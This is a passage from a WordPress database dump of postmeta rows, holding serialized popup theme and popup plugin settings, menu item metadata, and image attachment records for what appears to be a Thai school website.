Roman\";s:17:\"close_font_weight\";s:3:\"100\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:2:\"-1\";s:24:\"close_boxshadow_vertical\";s:1:\"1\";s:20:\"close_boxshadow_blur\";s:1:\"1\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"10\";s:27:\"close_textshadow_horizontal\";s:2:\"-1\";s:25:\"close_textshadow_vertical\";s:1:\"1\";s:21:\"close_textshadow_blur\";s:1:\"1\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"10\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),
(5223,1877,'popup_theme_data_version','3'),
(5224,1877,'_pum_built_in','cutting-edge'),
(5225,1878,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";s:2:\"50\";s:17:\"container_padding\";s:2:\"18\";s:26:\"container_background_color\";s:7:\"#fffbef\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:6:\"outset\";s:22:\"container_border_color\";s:7:\"#dd3333\";s:22:\"container_border_width\";s:2:\"20\";s:23:\"container_border_radius\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:3:\"yes\";s:30:\"container_boxshadow_horizontal\";s:1:\"1\";s:28:\"container_boxshadow_vertical\";s:1:\"1\";s:24:\"container_boxshadow_blur\";s:1:\"3\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"97\";s:16:\"title_font_color\";s:7:\"#000000\";s:17:\"title_line_height\";s:2:\"36\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"100\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:18:\"content_font_color\";s:7:\"#2d2d2d\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"100\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:3:\"-20\";s:19:\"close_position_left\";s:3:\"-20\";s:21:\"close_position_bottom\";s:1:\"0\";s:20:\"close_position_right\";s:3:\"-20\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"20\";s:11:\"close_width\";s:2:\"20\";s:22:\"close_background_color\";s:7:\"#000000\";s:24:\"close_background_opacity\";s:2:\"55\";s:16:\"close_font_color\";s:7:\"#ffffff\";s:17:\"close_line_height\";s:2:\"18\";s:15:\"close_font_size\";s:2:\"16\";s:17:\"close_font_family\";s:6:\"Tahoma\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:19:\"close_border_radius\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:2:\"23\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:2:\"23\";s:13:\"atc_promotion\";N;s:22:\"close_position_outside\";i:0;}'),
(5226,1878,'popup_theme_data_version','3'),
(5227,1878,'_pum_built_in','framed-border'),
(5228,1879,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#ffffff\";s:26:\"overlay_background_opacity\";s:1:\"0\";s:13:\"atc_promotion\";N;s:17:\"container_padding\";s:1:\"8\";s:23:\"container_border_radius\";s:1:\"0\";s:26:\"container_background_color\";s:7:\"#eef6fc\";s:28:\"container_background_opacity\";s:3:\"100\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:2:\"23\";s:30:\"container_boxshadow_horizontal\";s:1:\"1\";s:28:\"container_boxshadow_vertical\";s:1:\"1\";s:24:\"container_boxshadow_blur\";s:1:\"3\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#505050\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_line_height\";s:2:\"36\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"400\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:18:\"content_font_color\";s:7:\"#505050\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"400\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:22:\"close_position_outside\";i:0;s:14:\"close_location\";s:11:\"middleright\";s:18:\"close_position_top\";s:1:\"0\";s:21:\"close_position_bottom\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"5\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"18\";s:11:\"close_width\";s:2:\"18\";s:19:\"close_border_radius\";s:2:\"15\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:1:\"0\";s:16:\"close_font_color\";s:7:\"#505050\";s:15:\"close_font_size\";s:2:\"15\";s:17:\"close_line_height\";s:2:\"18\";s:17:\"close_font_family\";s:10:\"Sans-Serif\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:5:\"solid\";s:18:\"close_border_color\";s:7:\"#505050\";s:18:\"close_border_width\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:1:\"0\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:1:\"0\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";}'),
(5229,1879,'popup_theme_data_version','3'),
(5230,1879,'_pum_built_in','floating-bar'),
(5231,1880,'popup_theme_settings','a:67:{s:24:\"overlay_background_color\";s:7:\"#000000\";s:26:\"overlay_background_opacity\";s:2:\"70\";s:13:\"atc_promotion\";N;s:17:\"container_padding\";s:1:\"0\";s:23:\"container_border_radius\";s:1:\"0\";s:26:\"container_background_color\";s:0:\"\";s:28:\"container_background_opacity\";s:1:\"0\";s:22:\"container_border_style\";s:4:\"none\";s:22:\"container_border_color\";s:7:\"#000000\";s:22:\"container_border_width\";s:1:\"1\";s:25:\"container_boxshadow_color\";s:7:\"#020202\";s:27:\"container_boxshadow_opacity\";s:1:\"0\";s:30:\"container_boxshadow_horizontal\";s:1:\"0\";s:28:\"container_boxshadow_vertical\";s:1:\"0\";s:24:\"container_boxshadow_blur\";s:1:\"0\";s:26:\"container_boxshadow_spread\";s:1:\"0\";s:25:\"container_boxshadow_inset\";s:2:\"no\";s:16:\"title_font_color\";s:7:\"#000000\";s:15:\"title_font_size\";s:2:\"32\";s:17:\"title_line_height\";s:2:\"36\";s:17:\"title_font_family\";s:7:\"inherit\";s:17:\"title_font_weight\";s:3:\"400\";s:16:\"title_font_style\";s:0:\"\";s:16:\"title_text_align\";s:4:\"left\";s:22:\"title_textshadow_color\";s:7:\"#020202\";s:24:\"title_textshadow_opacity\";s:2:\"23\";s:27:\"title_textshadow_horizontal\";s:1:\"0\";s:25:\"title_textshadow_vertical\";s:1:\"0\";s:21:\"title_textshadow_blur\";s:1:\"0\";s:18:\"content_font_color\";s:7:\"#8c8c8c\";s:19:\"content_font_family\";s:7:\"inherit\";s:19:\"content_font_weight\";s:3:\"400\";s:18:\"content_font_style\";s:0:\"\";s:10:\"close_text\";s:2:\"×\";s:22:\"close_position_outside\";i:0;s:14:\"close_location\";s:8:\"topright\";s:18:\"close_position_top\";s:1:\"7\";s:21:\"close_position_bottom\";s:1:\"0\";s:19:\"close_position_left\";s:1:\"0\";s:20:\"close_position_right\";s:1:\"7\";s:13:\"close_padding\";s:1:\"0\";s:12:\"close_height\";s:2:\"18\";s:11:\"close_width\";s:2:\"18\";s:19:\"close_border_radius\";s:2:\"15\";s:22:\"close_background_color\";s:7:\"#ffffff\";s:24:\"close_background_opacity\";s:1:\"0\";s:16:\"close_font_color\";s:7:\"#000000\";s:15:\"close_font_size\";s:2:\"20\";s:17:\"close_line_height\";s:2:\"20\";s:17:\"close_font_family\";s:7:\"inherit\";s:17:\"close_font_weight\";s:3:\"700\";s:16:\"close_font_style\";s:0:\"\";s:18:\"close_border_style\";s:4:\"none\";s:18:\"close_border_color\";s:7:\"#ffffff\";s:18:\"close_border_width\";s:1:\"1\";s:21:\"close_boxshadow_color\";s:7:\"#020202\";s:23:\"close_boxshadow_opacity\";s:1:\"0\";s:26:\"close_boxshadow_horizontal\";s:1:\"0\";s:24:\"close_boxshadow_vertical\";s:1:\"0\";s:20:\"close_boxshadow_blur\";s:1:\"0\";s:22:\"close_boxshadow_spread\";s:1:\"0\";s:21:\"close_boxshadow_inset\";s:2:\"no\";s:22:\"close_textshadow_color\";s:7:\"#000000\";s:24:\"close_textshadow_opacity\";s:1:\"0\";s:27:\"close_textshadow_horizontal\";s:1:\"0\";s:25:\"close_textshadow_vertical\";s:1:\"0\";s:21:\"close_textshadow_blur\";s:1:\"0\";}'),
(5232,1880,'popup_theme_data_version','3'),
(5233,1880,'_pum_built_in','content-only'),
(5234,1881,'popup_title','Our Spring Sale Has Started'),
(5235,1881,'enabled','0'),
(5236,1881,'pum_example_popup','auto_open_announcement'),
(5237,1881,'popup_settings','a:39:{s:8:\"triggers\";a:1:{i:0;a:2:{s:4:\"type\";s:9:\"auto_open\";s:8:\"settings\";a:2:{s:11:\"cookie_name\";s:8:\"pum-1881\";s:5:\"delay\";i:500;}}}s:7:\"cookies\";a:1:{i:0;a:2:{s:5:\"event\";s:14:\"on_popup_close\";s:8:\"settings\";a:5:{s:4:\"name\";s:8:\"pum-1881\";s:3:\"key\";s:0:\"\";s:7:\"session\";b:0;s:4:\"time\";s:7:\"1 month\";s:4:\"path\";s:1:\"1\";}}}s:10:\"conditions\";a:1:{i:0;a:1:{i:0;a:1:{s:6:\"target\";s:13:\"is_front_page\";}}}s:8:\"theme_id\";i:1873;s:4:\"size\";s:6:\"medium\";s:20:\"responsive_min_width\";s:2:\"0%\";s:20:\"responsive_max_width\";s:4:\"100%\";s:12:\"custom_width\";s:5:\"640px\";s:13:\"custom_height\";s:5:\"380px\";s:14:\"animation_type\";s:4:\"fade\";s:15:\"animation_speed\";s:3:\"350\";s:16:\"animation_origin\";s:10:\"center top\";s:10:\"open_sound\";s:4:\"none\";s:12:\"custom_sound\";s:0:\"\";s:8:\"location\";s:6:\"center\";s:12:\"position_top\";s:3:\"100\";s:15:\"position_bottom\";s:1:\"0\";s:13:\"position_left\";s:1:\"0\";s:14:\"position_right\";s:1:\"0\";s:6:\"zindex\";s:10:\"1999999999\";s:10:\"close_text\";s:0:\"\";s:18:\"close_button_delay\";s:1:\"0\";s:30:\"close_on_form_submission_delay\";s:1:\"0\";s:17:\"disable_on_mobile\";b:0;s:17:\"disable_on_tablet\";b:0;s:18:\"custom_height_auto\";b:0;s:18:\"scrollable_content\";b:0;s:21:\"position_from_trigger\";b:0;s:14:\"position_fixed\";b:0;s:16:\"overlay_disabled\";b:0;s:9:\"stackable\";b:0;s:18:\"disable_reposition\";b:0;s:24:\"close_on_form_submission\";b:0;s:22:\"close_on_overlay_click\";b:0;s:18:\"close_on_esc_press\";b:0;s:17:\"close_on_f4_press\";b:0;s:19:\"disable_form_reopen\";b:0;s:21:\"disable_accessibility\";b:0;s:10:\"theme_slug\";s:13:\"default-theme\";}'),
(5238,1881,'data_version','3'),
(5239,1882,'data_version','3'),
(5240,1882,'popup_open_count','0'),
(5241,1882,'popup_conversion_count','0'),
(5242,1882,'_edit_last','1'),
(5243,1882,'_edit_lock','1752629172:1'),
(5249,1885,'_wp_attached_file','2025/07/สีเขียว-สีเหลือง-น่ารัก-ภาพประกอบ-ยินดีต้อนรับ-เปิดเทอม-แบนเนอร์-297-x-210-มม.-เว็บไซต์.png'),
(5250,1885,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1366;s:6:\"height\";i:768;s:4:\"file\";s:235:\"2025/07/สีเขียว-สีเหลือง-น่ารัก-ภาพประกอบ-ยินดีต้อนรับ-เปิดเทอม-แบนเนอร์-297-x-210-มม.-เว็บไซต์.png\";s:8:\"filesize\";i:1316881;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:235:\"สีเขียว-สีเหลือง-น่ารัก-ภาพประกอบ-ยินดีต้อนรับ-เปิดเทอม-แบนเนอร์-297-x-210-มม.-เว็บไซต์-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:83027;}s:5:\"large\";a:5:{s:4:\"file\";s:236:\"สีเขียว-สีเหลือง-น่ารัก-ภาพประกอบ-ยินดีต้อนรับ-เปิดเทอม-แบนเนอร์-297-x-210-มม.-เว็บไซต์-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:620787;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:235:\"สีเขียว-สีเหลือง-น่ารัก-ภาพประกอบ-ยินดีต้อนรับ-เปิดเทอม-แบนเนอร์-297-x-210-มม.-เว็บไซต์-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37823;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:235:\"สีเขียว-สีเหลือง-น่ารัก-ภาพประกอบ-ยินดีต้อนรับ-เปิดเทอม-แบนเนอร์-297-x-210-มม.-เว็บไซต์-768x432.png\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:397418;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:235:\"สีเขียว-สีเหลือง-น่ารัก-ภาพประกอบ-ยินดีต้อนรับ-เปิดเทอม-แบนเนอร์-297-x-210-มม.-เว็บไซต์-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:108794;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5251,1888,'sg_popup_scripts','a:2:{s:2:\"js\";a:0:{}s:3:\"css\";s:0:\"\";}'),
(5252,1888,'sg_popup_target_preview','a:2:{s:11:\"sgpb-target\";a:1:{i:0;a:1:{i:0;a:3:{s:5:\"param\";s:9:\"page_type\";s:8:\"operator\";s:2:\"==\";s:5:\"value\";a:1:{i:0;s:12:\"is_home_page\";}}}}s:15:\"sgpb-conditions\";N;}'),
(5253,1888,'sg_popup_events_preview','a:1:{i:0;a:1:{i:0;a:3:{s:5:\"param\";s:4:\"load\";s:5:\"value\";s:0:\"\";s:12:\"hiddenOption\";a:0:{}}}}'),
(5254,1888,'sg_popup_options_preview','a:43:{s:14:\"sgpb-image-url\";s:688:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/%E0%B8%AA%E0%B8%B5%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%A7-%E0%B8%AA%E0%B8%B5%E0%B9%80%E0%B8%AB%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%87-%E0%B8%99%E0%B9%88%E0%B8%B2%E0%B8%A3%E0%B8%B1%E0%B8%81-%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%AD%E0%B8%9A-%E0%B8%A2%E0%B8%B4%E0%B8%99%E0%B8%94%E0%B8%B5%E0%B8%95%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%A3%E0%B8%B1%E0%B8%9A-%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B9%80%E0%B8%97%E0%B8%AD%E0%B8%A1-%E0%B9%81%E0%B8%9A%E0%B8%99%E0%B9%80%E0%B8%99%E0%B8%AD%E0%B8%A3%E0%B9%8C-297-x-210-%E0%B8%A1%E0%B8%A1.-%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B9%84%E0%B8%8B%E0%B8%95%E0%B9%8C.png\";s:9:\"sgpb-type\";s:5:\"image\";s:15:\"sgpb-is-preview\";s:1:\"1\";s:14:\"sgpb-is-active\";s:0:\"\";s:34:\"sgpb-behavior-after-special-events\";a:1:{i:0;a:1:{i:0;a:1:{s:5:\"param\";s:12:\"select_event\";}}}s:18:\"sgpb-popup-z-index\";s:4:\"9999\";s:17:\"sgpb-popup-themes\";s:12:\"sgpb-theme-1\";s:18:\"sgpb-overlay-color\";s:0:\"\";s:20:\"sgpb-overlay-opacity\";s:3:\"0.8\";s:25:\"sgpb-content-custom-class\";s:16:\"sg-popup-content\";s:12:\"sgpb-esc-key\";s:2:\"on\";s:24:\"sgpb-enable-close-button\";s:2:\"on\";s:23:\"sgpb-close-button-delay\";s:1:\"0\";s:26:\"sgpb-close-button-position\";s:11:\"bottomRight\";s:24:\"sgpb-button-position-top\";s:0:\"\";s:26:\"sgpb-button-position-right\";s:1:\"9\";s:27:\"sgpb-button-position-bottom\";s:1:\"9\";s:25:\"sgpb-button-position-left\";s:0:\"\";s:17:\"sgpb-button-image\";s:0:\"\";s:23:\"sgpb-button-image-width\";s:2:\"21\";s:24:\"sgpb-button-image-height\";s:2:\"21\";s:17:\"sgpb-border-color\";s:7:\"#000000\";s:18:\"sgpb-border-radius\";s:1:\"0\";s:23:\"sgpb-border-radius-type\";s:1:\"%\";s:16:\"sgpb-button-text\";s:5:\"Close\";s:18:\"sgpb-overlay-click\";s:2:\"on\";s:25:\"sgpb-popup-dimension-mode\";s:14:\"responsiveMode\";s:33:\"sgpb-responsive-dimension-measure\";s:4:\"auto\";s:10:\"sgpb-width\";s:5:\"640px\";s:11:\"sgpb-height\";s:5:\"480px\";s:14:\"sgpb-max-width\";s:0:\"\";s:15:\"sgpb-max-height\";s:0:\"\";s:14:\"sgpb-min-width\";s:5:\"120px\";s:15:\"sgpb-min-height\";s:0:\"\";s:26:\"sgpb-open-animation-effect\";s:9:\"No effect\";s:27:\"sgpb-close-animation-effect\";s:9:\"No effect\";s:29:\"sgpb-enable-content-scrolling\";s:2:\"on\";s:16:\"sgpb-popup-order\";s:1:\"0\";s:16:\"sgpb-popup-delay\";s:1:\"0\";s:12:\"sgpb-post-id\";s:4:\"1888\";s:25:\"sgpb-enable-popup-overlay\";s:2:\"on\";s:22:\"sgpb-button-image-data\";s:0:\"\";s:26:\"sgpb-background-image-data\";s:0:\"\";}'),
(5255,1888,'_edit_last','1'),
(5256,1888,'_edit_lock','1752635229:1'),
(5257,1888,'sg_popup_target','a:2:{s:11:\"sgpb-target\";a:1:{i:0;a:1:{i:0;a:3:{s:5:\"param\";s:9:\"page_type\";s:8:\"operator\";s:2:\"==\";s:5:\"value\";a:1:{i:0;s:12:\"is_home_page\";}}}}s:15:\"sgpb-conditions\";N;}'),
(5258,1888,'sg_popup_events','a:1:{i:0;a:1:{i:0;a:3:{s:5:\"param\";s:4:\"load\";s:5:\"value\";s:0:\"\";s:12:\"hiddenOption\";a:0:{}}}}'),
(5259,1888,'sg_popup_options','a:43:{s:14:\"sgpb-image-url\";s:688:\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/%E0%B8%AA%E0%B8%B5%E0%B9%80%E0%B8%82%E0%B8%B5%E0%B8%A2%E0%B8%A7-%E0%B8%AA%E0%B8%B5%E0%B9%80%E0%B8%AB%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%87-%E0%B8%99%E0%B9%88%E0%B8%B2%E0%B8%A3%E0%B8%B1%E0%B8%81-%E0%B8%A0%E0%B8%B2%E0%B8%9E%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%AD%E0%B8%9A-%E0%B8%A2%E0%B8%B4%E0%B8%99%E0%B8%94%E0%B8%B5%E0%B8%95%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%A3%E0%B8%B1%E0%B8%9A-%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B9%80%E0%B8%97%E0%B8%AD%E0%B8%A1-%E0%B9%81%E0%B8%9A%E0%B8%99%E0%B9%80%E0%B8%99%E0%B8%AD%E0%B8%A3%E0%B9%8C-297-x-210-%E0%B8%A1%E0%B8%A1.-%E0%B9%80%E0%B8%A7%E0%B9%87%E0%B8%9A%E0%B9%84%E0%B8%8B%E0%B8%95%E0%B9%8C.png\";s:9:\"sgpb-type\";s:5:\"image\";s:15:\"sgpb-is-preview\";s:1:\"0\";s:14:\"sgpb-is-active\";s:0:\"\";s:34:\"sgpb-behavior-after-special-events\";a:1:{i:0;a:1:{i:0;a:1:{s:5:\"param\";s:12:\"select_event\";}}}s:18:\"sgpb-popup-z-index\";s:4:\"9999\";s:17:\"sgpb-popup-themes\";s:12:\"sgpb-theme-1\";s:18:\"sgpb-overlay-color\";s:0:\"\";s:20:\"sgpb-overlay-opacity\";s:3:\"0.8\";s:25:\"sgpb-content-custom-class\";s:16:\"sg-popup-content\";s:12:\"sgpb-esc-key\";s:2:\"on\";s:24:\"sgpb-enable-close-button\";s:2:\"on\";s:23:\"sgpb-close-button-delay\";s:1:\"0\";s:26:\"sgpb-close-button-position\";s:11:\"bottomRight\";s:24:\"sgpb-button-position-top\";s:0:\"\";s:26:\"sgpb-button-position-right\";s:1:\"9\";s:27:\"sgpb-button-position-bottom\";s:1:\"9\";s:25:\"sgpb-button-position-left\";s:0:\"\";s:17:\"sgpb-button-image\";s:0:\"\";s:23:\"sgpb-button-image-width\";s:2:\"21\";s:24:\"sgpb-button-image-height\";s:2:\"21\";s:17:\"sgpb-border-color\";s:7:\"#000000\";s:18:\"sgpb-border-radius\";s:1:\"0\";s:23:\"sgpb-border-radius-type\";s:1:\"%\";s:16:\"sgpb-button-text\";s:5:\"Close\";s:18:\"sgpb-overlay-click\";s:2:\"on\";s:25:\"sgpb-popup-dimension-mode\";s:14:\"responsiveMode\";s:33:\"sgpb-responsive-dimension-measure\";s:4:\"auto\";s:10:\"sgpb-width\";s:5:\"640px\";s:11:\"sgpb-height\";s:5:\"480px\";s:14:\"sgpb-max-width\";s:0:\"\";s:15:\"sgpb-max-height\";s:0:\"\";s:14:\"sgpb-min-width\";s:5:\"120px\";s:15:\"sgpb-min-height\";s:0:\"\";s:26:\"sgpb-open-animation-effect\";s:9:\"No effect\";s:27:\"sgpb-close-animation-effect\";s:9:\"No effect\";s:29:\"sgpb-enable-content-scrolling\";s:2:\"on\";s:16:\"sgpb-popup-order\";s:1:\"0\";s:16:\"sgpb-popup-delay\";s:1:\"0\";s:12:\"sgpb-post-id\";s:4:\"1888\";s:25:\"sgpb-enable-popup-overlay\";s:2:\"on\";s:22:\"sgpb-button-image-data\";s:0:\"\";s:26:\"sgpb-background-image-data\";s:0:\"\";}'),
(5293,1897,'_menu_item_type','post_type'),
(5294,1897,'_menu_item_menu_item_parent','0'),
(5295,1897,'_menu_item_object_id','14'),
(5296,1897,'_menu_item_object','page'),
(5297,1897,'_menu_item_target',''),
(5298,1897,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(5299,1897,'_menu_item_xfn',''),
(5300,1897,'_menu_item_url',''),
(5301,1897,'_menu_item_orphaned','1752638816'),
(5306,14,'_wp_page_template','default'),
(5321,16,'_wp_old_date','2024-08-20'),
(5323,17,'_wp_old_date','2024-08-20'),
(5325,553,'_wp_old_date','2024-08-20'),
(5327,554,'_wp_old_date','2024-08-20'),
(5329,18,'_wp_old_date','2024-08-20'),
(5331,19,'_wp_old_date','2024-08-20'),
(5333,20,'_wp_old_date','2024-08-20'),
(5335,16,'_menu_sgpb_popup_id','0'),
(5336,17,'_menu_sgpb_popup_id','0'),
(5337,553,'_menu_sgpb_popup_id','0'),
(5338,554,'_menu_sgpb_popup_id','0'),
(5339,18,'_menu_sgpb_popup_id','0'),
(5340,19,'_menu_sgpb_popup_id','0'),
(5341,20,'_menu_sgpb_popup_id','0'),
(5342,1900,'title_style','hidden'),
(5343,1900,'_title_style','field_5d1a0217cf408'),
(5344,1901,'_wp_attached_file','2025/07/กระดาน-ถาม-ตอบ.gif'),
(5345,1901,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1204;s:6:\"height\";i:333;s:4:\"file\";s:50:\"2025/07/กระดาน-ถาม-ตอบ.gif\";s:8:\"filesize\";i:156638;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:49:\"กระดาน-ถาม-ตอบ-300x83.gif\";s:5:\"width\";i:300;s:6:\"height\";i:83;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:5687;}s:5:\"large\";a:5:{s:4:\"file\";s:51:\"กระดาน-ถาม-ตอบ-1024x283.gif\";s:5:\"width\";i:1024;s:6:\"height\";i:283;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:30974;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:50:\"กระดาน-ถาม-ตอบ-150x150.gif\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:1926;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:50:\"กระดาน-ถาม-ตอบ-768x212.gif\";s:5:\"width\";i:768;s:6:\"height\";i:212;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:19467;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:50:\"กระดาน-ถาม-ตอบ-360x189.gif\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/gif\";s:8:\"filesize\";i:8549;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5350,1903,'_wp_attached_file','2025/07/prr.png'),
(5351,1903,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:15:\"2025/07/prr.png\";s:8:\"filesize\";i:1283535;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"prr-300x169.png\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:65980;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"prr-1024x576.png\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:580623;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"prr-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:28063;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"prr-768x432.png\";s:5:\"width\";i:768;s